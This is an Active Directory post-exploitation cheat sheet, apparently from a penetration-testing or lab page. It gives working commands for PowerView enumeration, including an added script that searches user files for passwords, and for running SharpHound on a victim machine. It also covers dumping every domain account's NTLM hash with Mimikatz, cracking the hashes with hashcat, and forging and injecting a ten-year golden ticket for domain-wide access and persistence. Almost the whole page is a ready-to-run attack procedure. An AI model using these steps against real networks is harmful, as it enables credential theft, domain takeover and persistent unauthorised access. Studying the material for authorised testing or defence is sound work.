Priv Esc (Post Exploitation)
Strategies for Active Directory (AD) pentesting after an initial compromise of a domain-joined machine
PowerView
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerView is the AD enumeration component of PowerSploit. Start a PowerShell session with the execution policy bypassed and dot-source the script so its cmdlets are loaded into the current session:
powershell -ep bypass
. .\PowerView.ps1
Enumerate domain users: Get-NetUser | select cn
Enumerate domain groups whose name contains "admin" (the wildcards matter; a bare "admin" only matches a group with exactly that name): Get-NetGroup -GroupName *admin*
Find the operating systems running in the domain (an old OS is a candidate for a known exploit): Get-NetComputer -FullData | select operatingsystem
Find shares: Invoke-ShareFinder
Find text files containing a given string. This only looks at .txt files directly under C:\Users; searching the user profiles recursively needs Get-ChildItem -Recurse piped into Select-String:
Select-String -Path C:\Users\*.txt -Pattern <pattern>
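The enumeration steps above as one PowerShell script, saving each result to disk for later review. This is an added example, not code from the original page or from PowerSploit itself; it assumes the session was started with `powershell -ep bypass`, that PowerView.ps1 (the PowerSploit version that exposes the Get-Net* cmdlets) is in the current directory, and that the output folder and the search pattern are choices you make. It goes slightly beyond the list above by resolving the members of each admin group and by making the text search recursive.

```powershell
# Added example, not code from the original page or from PowerSploit.
# Runs the PowerView enumeration steps in one pass and saves the results.
# Assumptions: "powershell -ep bypass" session, PowerView.ps1 in the current
# directory, $OutDir is a folder you chose, the search pattern is illustrative.
param(
    [string]$OutDir = "$env:TEMP\ad-enum"   # assumed output folder
)

. .\PowerView.ps1
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Domain users with the attributes that usually matter next
#    (descriptions often leak passwords, old pwdlastset hints at weak policy).
Get-NetUser |
    Select-Object cn, samaccountname, description, pwdlastset, lastlogon |
    Export-Csv -Path "$OutDir\users.csv" -NoTypeInformation

# 2. Every group whose name contains "admin", and who is in it.
#    Get-NetGroup returns group names as strings; Get-NetGroupMember resolves them.
Get-NetGroup -GroupName '*admin*' | ForEach-Object {
    Get-NetGroupMember -GroupName $_
} | Select-Object GroupName, MemberName, IsGroup |
    Export-Csv -Path "$OutDir\admin-groups.csv" -NoTypeInformation

# 3. Computers grouped by operating system: an old OS in this list is a
#    candidate for a kernel or SMB exploit, the server list tells you where
#    to look for shares and services.
Get-NetComputer -FullData |
    Select-Object dnshostname, operatingsystem, operatingsystemversion |
    Tee-Object -FilePath "$OutDir\computers.txt" |
    Group-Object operatingsystem |
    Select-Object Count, Name |
    Sort-Object Count -Descending

# 4. Shares the current user can actually read, not just enumerate.
Invoke-ShareFinder -CheckShareAccess | Out-File -FilePath "$OutDir\shares.txt"

# 5. Recursive text search. Select-String only reads the files its path names,
#    so the recursion comes from Get-ChildItem; -List reports one hit per file.
Get-ChildItem -Path C:\Users -Recurse -Include *.txt -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password|passwd|pwd' -List |
    Select-Object Path, LineNumber, Line |
    Export-Csv -Path "$OutDir\text-hits.csv" -NoTypeInformation
```

Save it as a .ps1 and run it from the dot-sourcing session; the CSV files can be copied back to the attacking machine alongside the SharpHound archive collected in the next step.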
BloodHound and SharpHound
Installation (on the attacking machine):
apt-get install bloodhound
neo4j console => default credentials -> neo4j:neo4j (you are asked to change the password on first login; BloodHound then uses the new one)
On the victim machine, download the SharpHound collector (it ships with BloodHound) and run it from a bypassed PowerShell session. -Domain is the target domain's DNS name; CONTROLLER.local is the example here:
powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Then transfer the zip file to the attacking machine, start BloodHound, log in with the neo4j credentials and import the archive (drag the zip into the window). The built-in queries, e.g. "Shortest Paths to Domain Admins", show which of the users and machines found so far lead to domain admin:
bloodhound
Dump hashes w/ Mimikatz
Run mimikatz as a local administrator on the domain controller; privilege::debug grants the SeDebugPrivilege needed to read LSASS, and lsadump::lsa /patch prints the NTLM hash of every domain account:
mimikatz.exe
privilege::debug
lsadump::lsa /patch
Crack the dumped NTLM hashes offline (hashcat mode 1000 is NTLM; hashes.txt holds one hash per line):
hashcat -m 1000 hashes.txt rockyou.txt
Create Golden Ticket w/ Mimikatz
lsadump::lsa /inject /name:krbtgt
Note the domain SID (printed after "Domain :") and the krbtgt NTLM hash; both are required in the next command. /domain is the DNS name of the domain, not the NetBIOS name shown by lsadump, and /id is the RID of the account being forged (500 for the built-in Administrator; any other RID works, the KDC trusts whatever the ticket says because it is encrypted with the real krbtgt key):
kerberos::golden /user:<username> /domain:<controller.local> /sid:<S-1-5-21-...> /krbtgt:<krbtgt NTLM hash> /id:<RID>
Use the Golden Ticket to access other machines -
Without /ptt the command only writes ticket.kirbi to disk; either add /ptt to kerberos::golden or load the file with kerberos::ptt ticket.kirbi so the forged TGT is injected into the current logon session. Then spawn a shell that inherits it:
misc::cmd
- This opens a new command prompt in which every Kerberos-authenticated request carries the forged TGT, so it is accepted as the chosen user on every machine in the domain. Check it against the DC, e.g. dir \\<dc hostname>\C$, before moving on.
- The ticket stays valid (by default for ten years) until the krbtgt password is changed twice, which is why golden tickets are a persistence technique as much as an escalation one.